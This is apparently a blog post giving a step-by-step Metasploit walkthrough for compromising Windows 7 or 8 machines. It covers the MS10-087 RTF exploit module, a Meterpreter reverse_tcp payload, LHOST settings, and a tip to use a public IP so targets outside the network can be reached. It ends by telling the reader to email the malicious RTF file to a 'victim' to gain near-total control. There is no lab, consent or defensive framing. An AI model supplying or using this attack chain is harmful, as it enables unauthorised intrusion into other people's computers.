Hack Any Windows 7 Or 8 With Kali And Metasploit (.rtf Method)
Step 1: Start Metasploit
Open Terminal And Type : msfconsole
Then set Metasploit to use this exploit by typing:
command: use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Step 2: Set a Payload
We need to set a payload. In this case, we wish to use Metasploit's
powerful Meterpreter to establish a listener on the victim's system.
command: set payload windows/meterpreter/reverse_tcp
Step 3: Show Options
Now, let's look at our options. As you know from my previous Metasploit
blogs, every exploit has options, some mandatory and some not. Let's
take a look at the options for this exploit by typing:
command: show options
Step 4: Change FILENAME
command: set FILENAME <Your File Name.rtf>
Step 5: Set Your Local Host
Next we need to set the LHOST or the local host. This will be the
system we will be listening from--usually our local system--but it could
be any system you want to listen from. We simply need to set the LHOST
with the IP address of our listening system, in this case 192.168.1.107.
command: set LHOST 192.168.1.107
(If You Want To Hack Out Side Of Network Use Your Public IP)
Step 6: Last Check of Options
Before we exploit the victim's system, let's check to make sure all our options are set properly.
show options
Note in the screenshot that the FILENAME is now set to Kishan.rtf and the LHOST is 192.168.1.107
Step 7: Exploit
Now, we are ready to exploit. Simply type:
command: exploit
You can see that Metasploit has generated a file called Kishan.rtf and placed it at
/root/.msf4/local/Kishan.rtf.
Step 8: Send the File to the Victim
Now we need
to send this file to the victim through email or other method. Once the
victim opens the file, the Word application will hang or crash leaving
us with an active session of Meterpeter on the victim's system. With an
active Meterpreter session on the victim's system, we have nearly total
control or "own" their system.
No comments:
Post a Comment